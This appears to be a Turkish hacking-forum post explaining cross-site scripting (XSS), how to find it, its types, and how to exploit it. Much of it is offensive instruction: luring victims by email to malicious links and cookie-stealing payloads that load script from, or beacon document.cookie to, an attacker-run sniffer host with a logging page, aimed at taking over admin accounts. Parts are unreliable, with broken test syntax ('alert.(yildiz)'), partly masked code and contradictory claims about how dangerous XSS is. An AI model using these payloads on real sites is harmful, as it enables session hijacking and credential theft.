Hoşgeldin Misafir

XSS Açığı Nedir ? Nasıl Yararlanılır?

Reisci

Reisci

Yerli Ve Milli Hacker
11 Mar 2020
6,569 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
XSS AÇIĞI NEDİR ?


XSS_web-for-penterster-solution.png



XSS Açığı, Cross Site Scripting'dir. Büyük şirketlerde bile bu açık bulunur mesela örnek vermek gerekirse Arsenik hocamız paylaşmıştı Microsoft'un web sitesinde XSS Açığını bulduklarını mesela. Bu açık yorum veya text kutularında olan bir açıktır ve çok tehlikeli olduğu doğru değildir.


XSS AÇIĞI NASIL BULUNUR ?

XSS Açığı tespit etmek için yazı kutusuna html kodu yazmamız gerekir. Diğer adı ise alert kodudur. Örneğin "<script>alert.(yildiz)</script>" kodunu arama kutusuna yazdığımda yildiz yazısı bana gözüküyor ise anladım ki web sitesinde açık var.

Şimdi XSS Açıgını linkimize bakarakta anlayabiliriz.XSS açıkları genelde GET methodlarında olur GET methodu id=12 gibi sayilardan olusan linklerdir.SQL açikları gibi ve bu linklerde bulunur sqlmap bazen url tararken "xss vuln detected" tarzinda yazabilir dikkat ederseniz xssleri oradanda keşfetme yolunuz vardır.

mesela site herhangisite.com/ara.php?id=17 sonuna <script>alert.(yildiz)</script> eklediğimiz zaman yeniden hata verirse açık var demektir.

Birsürü kod forumda bulunmaktadır.


XSS AÇIĞI TÜRLERİ NELERDİR ?

-Reflected XSS:

Bu saldırı tipi açıklık bulunan sitede uygun alanlara yazılan javascript kodlarının çalıştırılması ile olur.Burada sadece saldırı yapan kişi etkiyi görebilir ziyaretçilere etki edemez.

Peki bunu nasıl atak haline getireceğiz. Burada sosyal mühendislik becerisi devreye giriyor.

Email kullanarak hedeflere oluşturduğunuz zararlı linki bir şekilde tıklattırmanız ve kendi sunucunuza yönlendirmeniz gerekiyor. Burada saldırgan sizin sitede mevcut olan cookie bilgilerinizi çalabilir.



Stored XSS:

Bu saldırı tipi reflected xss saldırısına göre daha fazla tehlikelidir. Saldırgan açıklık bulduğu alana zararlı javascript kodlarını ekleyerek veritabanına kaydeder. Veritabanına kaydedilen veriler siteyi ziyaret eden herkese etki eder.

Saldırganın koduna göre ziyaretçi etkilenme alanı değişir.



DOM XSS Saldırısı:

DOM XSS saldırısı en tehlikeli XSS saldırı türüdür. JavaScript kodlarının zararlı bir şekilde kullanılması ile yapılır. Bu saldırı türünde kullanılan DOM nesneleri ile hedef web sitesinin indexi değiştirilebilir

sayfanın kodları ile oynanabilir, virüs, trojan gibi zararlı kodlar sayfaya entegre edilebilir. Sitede gezinirken sizi başka sayfaya yönlendirebilir.

ISS kodlarıyla tehlikeli saldırılar yapılabilir Ve daha fazlası.


XSS SALDIRI ŞEKİLLERİ

Cookie Çalma:

cookie yani çerezler adminin login oldugu zaman tarayicilarin arkaplana kaydettigi beni hatırla tusuna tıkladıgında olusan sifrelerde bizde bunları çalarak admin id ve passwordumuzu ele
geçirmiş olucaz.


Açıklı parametre GET(id=1 gibi) metodu ile alınıyorsa;
http://site.com/index.php?ara=<script src=http://sniffersitemiz.com/a></script>
Burada "a" sayfası kendi hazırladığımızjavascripttir.

Kullandığım snifferdan örnek verecek olursam şuna benzer bi kod barındırır;
i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?'+********.cookie+' '+********.********

Burada javascript kodu üzerinden bir image nesnesi oluşturulur ve
http://sniffersitemiz.com/log.php?'+********.cookie+' '+********.********
verileri img src edilir.


log.php sayfamızda ise dışarıdan gelen değerleri loglarız.
Bu sayede ********.cookie ve ********.******** değerlerini loglamış oluruz.


<script src=http://sniffersitemiz.com/a></script> yerine
<script>i=new/**/Image();i.src=http://sniffersitemiz.com/log.php?'+********.cookie+' '+********.********</script>
kodunu da kullanabilirdik, burada amaç karmaşıklığı azaltmak ve mümkün olduğunca özel karakter kullanmamak.